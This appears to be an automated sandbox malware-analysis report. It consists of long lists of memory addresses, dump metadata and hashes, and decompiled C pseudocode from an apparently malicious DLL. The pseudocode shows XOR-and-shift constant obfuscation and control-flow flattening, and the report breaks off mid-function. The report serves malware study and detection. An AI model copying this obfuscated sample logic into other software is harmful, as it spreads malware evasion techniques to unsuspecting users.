                                                                                                                                                                            0x02f73cb4
                                                                                                                                                                            0x02f73cb6
                                                                                                                                                                            0x02f73cf7
                                                                                                                                                                            0x02f73cf7
                                                                                                                                                                            0x02f73cb8
                                                                                                                                                                            0x02f73cb8
                                                                                                                                                                            0x02f73cba
                                                                                                                                                                            0x02f73cba
                                                                                                                                                                            0x02f73cbe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73cc0
                                                                                                                                                                            0x02f73cd5
                                                                                                                                                                            0x02f73cda
                                                                                                                                                                            0x02f73cdd
                                                                                                                                                                            0x02f73cdf
                                                                                                                                                                            0x02f73ced
                                                                                                                                                                            0x02f73cee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73ce1
                                                                                                                                                                            0x02f73ce1
                                                                                                                                                                            0x02f73ce3
                                                                                                                                                                            0x02f73ce5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73ce7
                                                                                                                                                                            0x02f73ce7
                                                                                                                                                                            0x02f73cba
                                                                                                                                                                            0x02f73cbe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73cbe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73ce5
                                                                                                                                                                            0x02f73cba
                                                                                                                                                                            0x02f73cfe
                                                                                                                                                                            0x02f73cfe
                                                                                                                                                                            0x02f73d00
                                                                                                                                                                            0x02f73d27
                                                                                                                                                                            0x02f73d27
                                                                                                                                                                            0x02f73d02
                                                                                                                                                                            0x02f73d06
                                                                                                                                                                            0x02f73d16
                                                                                                                                                                            0x02f73d1d
                                                                                                                                                                            0x02f73d1d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73c06
                                                                                                                                                                            0x02f73c0c
                                                                                                                                                                            0x02f73de2
                                                                                                                                                                            0x02f73de2
                                                                                                                                                                            0x02f73de8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73dee
                                                                                                                                                                            0x02f73c12
                                                                                                                                                                            0x02f73c53
                                                                                                                                                                            0x02f73c58
                                                                                                                                                                            0x02f73c5a
                                                                                                                                                                            0x02f73c60
                                                                                                                                                                            0x02f73c66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73c66
                                                                                                                                                                            0x02f73c60
                                                                                                                                                                            0x02f73c0c
                                                                                                                                                                            0x02f73c04
                                                                                                                                                                            0x02f73bf8
                                                                                                                                                                            0x02f73bec
                                                                                                                                                                            0x02f73be0
                                                                                                                                                                            0x02f73dff
                                                                                                                                                                            0x02f73e02
                                                                                                                                                                            0x02f73e0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73e0b
                                                                                                                                                                            0x02f73db9
                                                                                                                                                                            0x02f73dba
                                                                                                                                                                            0x02f73dc0
                                                                                                                                                                            0x02f73dd0
                                                                                                                                                                            0x02f73dd2
                                                                                                                                                                            0x02f73dd5
                                                                                                                                                                            0x02f73dd7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73ddd
                                                                                                                                                                            0x02f73ddd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73ddd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73dd7

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
                                                                                                                                                                            • API String ID: 0-3081288078
                                                                                                                                                                            • Opcode ID: cacce43d87cdbfe26e58f4b1a7afa8b8d251c21dfabeb26b3c47f5e78c75f0b7
                                                                                                                                                                            • Instruction ID: 85cbf9442cd3f8d0ff58554a17fd9408c1f197f83c7b417db223c09d19de4588
                                                                                                                                                                            • Opcode Fuzzy Hash: cacce43d87cdbfe26e58f4b1a7afa8b8d251c21dfabeb26b3c47f5e78c75f0b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A0254715083809FD3A8CF65C989A5BBBE1FBC4758F10890DF6DA86260D7B58949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F746BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				void* _t316;
                                                                                                                                                                            				intOrPtr _t339;
                                                                                                                                                                            				intOrPtr* _t341;
                                                                                                                                                                            				void* _t343;
                                                                                                                                                                            				intOrPtr* _t346;
                                                                                                                                                                            				void* _t348;
                                                                                                                                                                            				intOrPtr* _t349;
                                                                                                                                                                            				void* _t351;
                                                                                                                                                                            				intOrPtr _t367;
                                                                                                                                                                            				signed int _t370;
                                                                                                                                                                            				signed int _t371;
                                                                                                                                                                            				signed int _t372;
                                                                                                                                                                            				signed int _t373;
                                                                                                                                                                            				void* _t375;
                                                                                                                                                                            				void* _t376;
                                                                                                                                                                            
                                                                                                                                                                            				_t369 = _a16;
                                                                                                                                                                            				_t349 = __edx;
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t316);
                                                                                                                                                                            				_v16 = 0xd9d351;
                                                                                                                                                                            				_t367 = 0;
                                                                                                                                                                            				_v12 = 0x17e122;
                                                                                                                                                                            				_t376 = _t375 + 0x18;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v96 = 0xcc9d59;
                                                                                                                                                                            				_t351 = 0xff449f4;
                                                                                                                                                                            				_v96 = _v96 << 0xc;
                                                                                                                                                                            				_v96 = _v96 + 0x162d;
                                                                                                                                                                            				_v96 = _v96 ^ 0xc9d5a62c;
                                                                                                                                                                            				_v132 = 0x3cc17f;
                                                                                                                                                                            				_v132 = _v132 + 0xffff84d9;
                                                                                                                                                                            				_t370 = 0x52;
                                                                                                                                                                            				_v132 = _v132 * 0x3d;
                                                                                                                                                                            				_v132 = _v132 << 0xf;
                                                                                                                                                                            				_v132 = _v132 ^ 0x617c0001;
                                                                                                                                                                            				_v48 = 0x63951b;
                                                                                                                                                                            				_v48 = _v48 >> 7;
                                                                                                                                                                            				_v48 = _v48 ^ 0x0000c72a;
                                                                                                                                                                            				_v64 = 0xbc1395;
                                                                                                                                                                            				_v64 = _v64 >> 0xd;
                                                                                                                                                                            				_v64 = _v64 ^ 0x000005e0;
                                                                                                                                                                            				_v80 = 0x50b5ee;
                                                                                                                                                                            				_v80 = _v80 + 0xf34;
                                                                                                                                                                            				_v80 = _v80 >> 1;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00286291;
                                                                                                                                                                            				_v92 = 0x9715d8;
                                                                                                                                                                            				_v92 = _v92 * 0x46;
                                                                                                                                                                            				_v92 = _v92 << 0xd;
                                                                                                                                                                            				_v92 = _v92 ^ 0xff220000;
                                                                                                                                                                            				_v52 = 0xfde3f2;
                                                                                                                                                                            				_v52 = _v52 + 0xa710;
                                                                                                                                                                            				_v52 = _v52 ^ 0x00fe8b02;
                                                                                                                                                                            				_v160 = 0x198337;
                                                                                                                                                                            				_v160 = _v160 + 0xffff007e;
                                                                                                                                                                            				_v160 = _v160 << 0x10;
                                                                                                                                                                            				_v160 = _v160 ^ 0x69569842;
                                                                                                                                                                            				_v160 = _v160 ^ 0xeaeb46e9;
                                                                                                                                                                            				_v28 = 0xcc69bd;
                                                                                                                                                                            				_v28 = _v28 ^ 0xeecfab9f;
                                                                                                                                                                            				_v28 = _v28 ^ 0xee01123b;
                                                                                                                                                                            				_v136 = 0x76b317;
                                                                                                                                                                            				_v136 = _v136 / _t370;
                                                                                                                                                                            				_v136 = _v136 + 0xffff81f3;
                                                                                                                                                                            				_v136 = _v136 << 3;
                                                                                                                                                                            				_v136 = _v136 ^ 0x00064d41;
                                                                                                                                                                            				_v112 = 0x80a4bd;
                                                                                                                                                                            				_v112 = _v112 * 0x13;
                                                                                                                                                                            				_v112 = _v112 << 0xa;
                                                                                                                                                                            				_v112 = _v112 + 0xcad4;
                                                                                                                                                                            				_v112 = _v112 ^ 0x30efc400;
                                                                                                                                                                            				_v144 = 0x82a288;
                                                                                                                                                                            				_v144 = _v144 << 2;
                                                                                                                                                                            				_v144 = _v144 >> 0xe;
                                                                                                                                                                            				_v144 = _v144 << 9;
                                                                                                                                                                            				_v144 = _v144 ^ 0x0011be13;
                                                                                                                                                                            				_v56 = 0x7edd30;
                                                                                                                                                                            				_v56 = _v56 * 0x55;
                                                                                                                                                                            				_v56 = _v56 ^ 0x2a184bb4;
                                                                                                                                                                            				_v88 = 0xe2a415;
                                                                                                                                                                            				_t371 = 6;
                                                                                                                                                                            				_v88 = _v88 * 0x2a;
                                                                                                                                                                            				_v88 = _v88 + 0xffff5f32;
                                                                                                                                                                            				_v88 = _v88 ^ 0x252ac732;
                                                                                                                                                                            				_v128 = 0xe004bc;
                                                                                                                                                                            				_v128 = _v128 ^ 0x574173bd;
                                                                                                                                                                            				_v128 = _v128 >> 9;
                                                                                                                                                                            				_v128 = _v128 ^ 0xd8221cc5;
                                                                                                                                                                            				_v128 = _v128 ^ 0xd803a3d4;
                                                                                                                                                                            				_v152 = 0x516ea5;
                                                                                                                                                                            				_v152 = _v152 + 0xffff4486;
                                                                                                                                                                            				_v152 = _v152 | 0x140257d0;
                                                                                                                                                                            				_v152 = _v152 >> 0xf;
                                                                                                                                                                            				_v152 = _v152 ^ 0x00051039;
                                                                                                                                                                            				_v120 = 0x9f4975;
                                                                                                                                                                            				_v120 = _v120 ^ 0x86b89632;
                                                                                                                                                                            				_v120 = _v120 * 0x24;
                                                                                                                                                                            				_v120 = _v120 | 0x1b5f0b87;
                                                                                                                                                                            				_v120 = _v120 ^ 0xdfd1de63;
                                                                                                                                                                            				_v36 = 0xa5f8e9;
                                                                                                                                                                            				_v36 = _v36 + 0x714e;
                                                                                                                                                                            				_v36 = _v36 ^ 0x00af22d8;
                                                                                                                                                                            				_v44 = 0x824fdb;
                                                                                                                                                                            				_v44 = _v44 + 0xffff91e5;
                                                                                                                                                                            				_v44 = _v44 ^ 0x008fd473;
                                                                                                                                                                            				_v68 = 0x680ab0;
                                                                                                                                                                            				_v68 = _v68 + 0xbc39;
                                                                                                                                                                            				_v68 = _v68 / _t371;
                                                                                                                                                                            				_v68 = _v68 ^ 0x001a68c1;
                                                                                                                                                                            				_v76 = 0x17a4af;
                                                                                                                                                                            				_v76 = _v76 >> 0xb;
                                                                                                                                                                            				_t372 = 0x5b;
                                                                                                                                                                            				_v76 = _v76 / _t372;
                                                                                                                                                                            				_v76 = _v76 ^ 0x0007f211;
                                                                                                                                                                            				_v84 = 0x315e60;
                                                                                                                                                                            				_v84 = _v84 + 0x702b;
                                                                                                                                                                            				_v84 = _v84 + 0xffff10cc;
                                                                                                                                                                            				_v84 = _v84 ^ 0x003e64ec;
                                                                                                                                                                            				_v100 = 0x9cc34d;
                                                                                                                                                                            				_v100 = _v100 | 0x947c2ff5;
                                                                                                                                                                            				_t373 = 0x3a;
                                                                                                                                                                            				_v100 = _v100 / _t373;
                                                                                                                                                                            				_v100 = _v100 ^ 0x02979c4b;
                                                                                                                                                                            				_v140 = 0xbfeff4;
                                                                                                                                                                            				_v140 = _v140 ^ 0x822e0370;
                                                                                                                                                                            				_v140 = _v140 + 0xf2f6;
                                                                                                                                                                            				_v140 = _v140 | 0x96ab8507;
                                                                                                                                                                            				_v140 = _v140 ^ 0x96bf89b8;
                                                                                                                                                                            				_v60 = 0xfd95c4;
                                                                                                                                                                            				_v60 = _v60 << 3;
                                                                                                                                                                            				_v60 = _v60 ^ 0x07e16726;
                                                                                                                                                                            				_v148 = 0x38036;
                                                                                                                                                                            				_v148 = _v148 ^ 0x54103d5f;
                                                                                                                                                                            				_v148 = _v148 | 0x54303272;
                                                                                                                                                                            				_t206 =  &_v148; // 0x54303272
                                                                                                                                                                            				_v148 =  *_t206;
                                                                                                                                                                            				_v148 = _v148 ^ 0x5432cd2c;
                                                                                                                                                                            				_v40 = 0xc550eb;
                                                                                                                                                                            				_v40 = _v40 | 0x63f29c9e;
                                                                                                                                                                            				_v40 = _v40 ^ 0x63f29262;
                                                                                                                                                                            				_v32 = 0xf7791b;
                                                                                                                                                                            				_v32 = _v32 * 0x51;
                                                                                                                                                                            				_v32 = _v32 ^ 0x4e4d9c2b;
                                                                                                                                                                            				_v156 = 0xdcae59;
                                                                                                                                                                            				_v156 = _v156 + 0xffffc6cd;
                                                                                                                                                                            				_v156 = _v156 + 0xfffffd52;
                                                                                                                                                                            				_v156 = _v156 ^ 0x46382038;
                                                                                                                                                                            				_v156 = _v156 ^ 0x46e78b29;
                                                                                                                                                                            				_v72 = 0xac5d66;
                                                                                                                                                                            				_v72 = _v72 | 0xb655dd15;
                                                                                                                                                                            				_v72 = _v72 + 0xffff07b1;
                                                                                                                                                                            				_v72 = _v72 ^ 0xb6f51c6c;
                                                                                                                                                                            				_v104 = 0x2e3a8e;
                                                                                                                                                                            				_v104 = _v104 | 0xfac334a1;
                                                                                                                                                                            				_v104 = _v104 << 4;
                                                                                                                                                                            				_v104 = _v104 ^ 0xaefe5277;
                                                                                                                                                                            				_v108 = 0xcd35f0;
                                                                                                                                                                            				_v108 = _v108 << 0xf;
                                                                                                                                                                            				_v108 = _v108 | 0xf31160b4;
                                                                                                                                                                            				_v108 = _v108 ^ 0xc3cc8d90;
                                                                                                                                                                            				_v108 = _v108 ^ 0x3831362e;
                                                                                                                                                                            				_v116 = 0x7e4b3f;
                                                                                                                                                                            				_v116 = _v116 << 9;
                                                                                                                                                                            				_v116 = _v116 + 0xa646;
                                                                                                                                                                            				_v116 = _v116 + 0x5b3c;
                                                                                                                                                                            				_v116 = _v116 ^ 0xfc982242;
                                                                                                                                                                            				_v124 = 0x9fd9df;
                                                                                                                                                                            				_v124 = _v124 >> 6;
                                                                                                                                                                            				_v124 = _v124 << 0xf;
                                                                                                                                                                            				_v124 = _v124 << 1;
                                                                                                                                                                            				_v124 = _v124 ^ 0x7f607f7f;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t351 != 0x8274db) {
                                                                                                                                                                            						if(_t351 == 0x30c1656) {
                                                                                                                                                                            							_push(_t351);
                                                                                                                                                                            							_push(_t351);
                                                                                                                                                                            							_t339 = E02F5C5D8(_v20);
                                                                                                                                                                            							_t376 = _t376 + 0xc;
                                                                                                                                                                            							_v24 = _t339;
                                                                                                                                                                            							if(_t339 != 0) {
                                                                                                                                                                            								_t351 = 0x6ee5562;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t351 == 0x6ee5562) {
                                                                                                                                                                            								_t341 =  *0x2f76224; // 0x0
                                                                                                                                                                            								_t343 = E02F711B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
                                                                                                                                                                            								_t376 = _t376 + 0x48;
                                                                                                                                                                            								if(_t343 == _v52) {
                                                                                                                                                                            									 *_t349 = _v24;
                                                                                                                                                                            									_t367 = 1;
                                                                                                                                                                            									 *((intOrPtr*)(_t349 + 4)) = _v20;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t351 = 0x8274db;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t351 == 0xc41b31c) {
                                                                                                                                                                            									_t346 =  *0x2f76224; // 0x0
                                                                                                                                                                            									_t348 = E02F711B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
                                                                                                                                                                            									_t376 = _t376 + 0x48;
                                                                                                                                                                            									if(_t348 == _v80) {
                                                                                                                                                                            										_t351 = 0x30c1656;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t351 != 0xff449f4) {
                                                                                                                                                                            										goto L14;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t351 = 0xc41b31c;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L17:
                                                                                                                                                                            						return _t367;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F72B09(_v108, _v24, _v116, _v124);
                                                                                                                                                                            					_t351 = 0xc0b2195;
                                                                                                                                                                            					L14:
                                                                                                                                                                            				} while (_t351 != 0xc0b2195);
                                                                                                                                                                            				goto L17;
                                                                                                                                                                            			}

























































                                                                                                                                                                            0x02f746c6
                                                                                                                                                                            0x02f746cd
                                                                                                                                                                            0x02f746d0
                                                                                                                                                                            0x02f746d1
                                                                                                                                                                            0x02f746d8
                                                                                                                                                                            0x02f746df
                                                                                                                                                                            0x02f746e6
                                                                                                                                                                            0x02f746e7
                                                                                                                                                                            0x02f746e8
                                                                                                                                                                            0x02f746ed
                                                                                                                                                                            0x02f746f8
                                                                                                                                                                            0x02f746fa
                                                                                                                                                                            0x02f74705
                                                                                                                                                                            0x02f74708
                                                                                                                                                                            0x02f74711
                                                                                                                                                                            0x02f74719
                                                                                                                                                                            0x02f7471e
                                                                                                                                                                            0x02f74723
                                                                                                                                                                            0x02f7472b
                                                                                                                                                                            0x02f74733
                                                                                                                                                                            0x02f7473b
                                                                                                                                                                            0x02f7474a
                                                                                                                                                                            0x02f7474b
                                                                                                                                                                            0x02f7474f
                                                                                                                                                                            0x02f74754
                                                                                                                                                                            0x02f7475c
                                                                                                                                                                            0x02f74767
                                                                                                                                                                            0x02f7476f
                                                                                                                                                                            0x02f7477a
                                                                                                                                                                            0x02f74782
                                                                                                                                                                            0x02f74787
                                                                                                                                                                            0x02f7478f
                                                                                                                                                                            0x02f74797
                                                                                                                                                                            0x02f7479f
                                                                                                                                                                            0x02f747a3
                                                                                                                                                                            0x02f747ab
                                                                                                                                                                            0x02f747b8
                                                                                                                                                                            0x02f747bc
                                                                                                                                                                            0x02f747c1
                                                                                                                                                                            0x02f747c9
                                                                                                                                                                            0x02f747d4
                                                                                                                                                                            0x02f747df
                                                                                                                                                                            0x02f747ea
                                                                                                                                                                            0x02f747f2
                                                                                                                                                                            0x02f747fa
                                                                                                                                                                            0x02f747ff
                                                                                                                                                                            0x02f74807
                                                                                                                                                                            0x02f7480f
                                                                                                                                                                            0x02f7481a
                                                                                                                                                                            0x02f74825
                                                                                                                                                                            0x02f74830
                                                                                                                                                                            0x02f7483e
                                                                                                                                                                            0x02f74842
                                                                                                                                                                            0x02f7484a
                                                                                                                                                                            0x02f7484f
                                                                                                                                                                            0x02f74857
                                                                                                                                                                            0x02f74864
                                                                                                                                                                            0x02f74868
                                                                                                                                                                            0x02f7486d
                                                                                                                                                                            0x02f74875
                                                                                                                                                                            0x02f7487d
                                                                                                                                                                            0x02f74885
                                                                                                                                                                            0x02f7488a
                                                                                                                                                                            0x02f7488f
                                                                                                                                                                            0x02f74894
                                                                                                                                                                            0x02f7489c
                                                                                                                                                                            0x02f748a9
                                                                                                                                                                            0x02f748ad
                                                                                                                                                                            0x02f748b5
                                                                                                                                                                            0x02f748c6
                                                                                                                                                                            0x02f748c9
                                                                                                                                                                            0x02f748cd
                                                                                                                                                                            0x02f748d5
                                                                                                                                                                            0x02f748dd
                                                                                                                                                                            0x02f748e5
                                                                                                                                                                            0x02f748ed
                                                                                                                                                                            0x02f748f2
                                                                                                                                                                            0x02f748fa
                                                                                                                                                                            0x02f74902
                                                                                                                                                                            0x02f7490a
                                                                                                                                                                            0x02f74912
                                                                                                                                                                            0x02f7491a
                                                                                                                                                                            0x02f7491f
                                                                                                                                                                            0x02f74927
                                                                                                                                                                            0x02f7492f
                                                                                                                                                                            0x02f7493c
                                                                                                                                                                            0x02f74940
                                                                                                                                                                            0x02f74948
                                                                                                                                                                            0x02f74950
                                                                                                                                                                            0x02f7495b
                                                                                                                                                                            0x02f74966
                                                                                                                                                                            0x02f74971
                                                                                                                                                                            0x02f7497c
                                                                                                                                                                            0x02f74987
                                                                                                                                                                            0x02f74992
                                                                                                                                                                            0x02f7499a
                                                                                                                                                                            0x02f749aa
                                                                                                                                                                            0x02f749ae
                                                                                                                                                                            0x02f749b6
                                                                                                                                                                            0x02f749be
                                                                                                                                                                            0x02f749c7
                                                                                                                                                                            0x02f749cc
                                                                                                                                                                            0x02f749d2
                                                                                                                                                                            0x02f749da
                                                                                                                                                                            0x02f749e2
                                                                                                                                                                            0x02f749ea
                                                                                                                                                                            0x02f749f2
                                                                                                                                                                            0x02f749fa
                                                                                                                                                                            0x02f74a02
                                                                                                                                                                            0x02f74a0e
                                                                                                                                                                            0x02f74a11
                                                                                                                                                                            0x02f74a15
                                                                                                                                                                            0x02f74a1d
                                                                                                                                                                            0x02f74a25
                                                                                                                                                                            0x02f74a2d
                                                                                                                                                                            0x02f74a35
                                                                                                                                                                            0x02f74a3d
                                                                                                                                                                            0x02f74a45
                                                                                                                                                                            0x02f74a4d
                                                                                                                                                                            0x02f74a52
                                                                                                                                                                            0x02f74a5a
                                                                                                                                                                            0x02f74a62
                                                                                                                                                                            0x02f74a6a
                                                                                                                                                                            0x02f74a72
                                                                                                                                                                            0x02f74a76
                                                                                                                                                                            0x02f74a7a
                                                                                                                                                                            0x02f74a82
                                                                                                                                                                            0x02f74a8d
                                                                                                                                                                            0x02f74a98
                                                                                                                                                                            0x02f74aa3
                                                                                                                                                                            0x02f74ab6
                                                                                                                                                                            0x02f74abd
                                                                                                                                                                            0x02f74ac8
                                                                                                                                                                            0x02f74ad0
                                                                                                                                                                            0x02f74ad8
                                                                                                                                                                            0x02f74ae0
                                                                                                                                                                            0x02f74aed
                                                                                                                                                                            0x02f74af5
                                                                                                                                                                            0x02f74afd
                                                                                                                                                                            0x02f74b05
                                                                                                                                                                            0x02f74b0d
                                                                                                                                                                            0x02f74b15
                                                                                                                                                                            0x02f74b1d
                                                                                                                                                                            0x02f74b25
                                                                                                                                                                            0x02f74b2a
                                                                                                                                                                            0x02f74b32
                                                                                                                                                                            0x02f74b3a
                                                                                                                                                                            0x02f74b3f
                                                                                                                                                                            0x02f74b47
                                                                                                                                                                            0x02f74b4f
                                                                                                                                                                            0x02f74b57
                                                                                                                                                                            0x02f74b5f
                                                                                                                                                                            0x02f74b64
                                                                                                                                                                            0x02f74b6c
                                                                                                                                                                            0x02f74b74
                                                                                                                                                                            0x02f74b7c
                                                                                                                                                                            0x02f74b84
                                                                                                                                                                            0x02f74b89
                                                                                                                                                                            0x02f74b8e
                                                                                                                                                                            0x02f74b92
                                                                                                                                                                            0x02f74b9a
                                                                                                                                                                            0x02f74b9a
                                                                                                                                                                            0x02f74ba8
                                                                                                                                                                            0x02f74cdd
                                                                                                                                                                            0x02f74cde
                                                                                                                                                                            0x02f74ce6
                                                                                                                                                                            0x02f74ceb
                                                                                                                                                                            0x02f74cee
                                                                                                                                                                            0x02f74cf7
                                                                                                                                                                            0x02f74cf9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74cf9
                                                                                                                                                                            0x02f74bae
                                                                                                                                                                            0x02f74bb4
                                                                                                                                                                            0x02f74c4e
                                                                                                                                                                            0x02f74caf
                                                                                                                                                                            0x02f74cb4
                                                                                                                                                                            0x02f74cbe
                                                                                                                                                                            0x02f74d39
                                                                                                                                                                            0x02f74d3b
                                                                                                                                                                            0x02f74d43
                                                                                                                                                                            0x02f74cc0
                                                                                                                                                                            0x02f74cc0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74cc0
                                                                                                                                                                            0x02f74bba
                                                                                                                                                                            0x02f74bc0
                                                                                                                                                                            0x02f74bd9
                                                                                                                                                                            0x02f74c2e
                                                                                                                                                                            0x02f74c33
                                                                                                                                                                            0x02f74c3a
                                                                                                                                                                            0x02f74c40
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74c40
                                                                                                                                                                            0x02f74bc2
                                                                                                                                                                            0x02f74bc8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74bce
                                                                                                                                                                            0x02f74bce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74bce
                                                                                                                                                                            0x02f74bc8
                                                                                                                                                                            0x02f74bc0
                                                                                                                                                                            0x02f74bb4
                                                                                                                                                                            0x02f74d46
                                                                                                                                                                            0x02f74d52
                                                                                                                                                                            0x02f74d52
                                                                                                                                                                            0x02f74d16
                                                                                                                                                                            0x02f74d1d
                                                                                                                                                                            0x02f74d22
                                                                                                                                                                            0x02f74d22
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
                                                                                                                                                                            • API String ID: 0-914106314
                                                                                                                                                                            • Opcode ID: 1513a7ed03a8becca6694cadc7c2c7d8be68065cd8e25348cbf12292268356c5
                                                                                                                                                                            • Instruction ID: 083c337a3f06a3931c01cfee6bff1b2d0441b45243d24fd05a6d889f8b4ecf67
                                                                                                                                                                            • Opcode Fuzzy Hash: 1513a7ed03a8becca6694cadc7c2c7d8be68065cd8e25348cbf12292268356c5
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF1EE72509380DFD769CF65C989A4BBBF1BB85748F108A1DE2DA86260D7B58948CF03
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F6017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				char _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
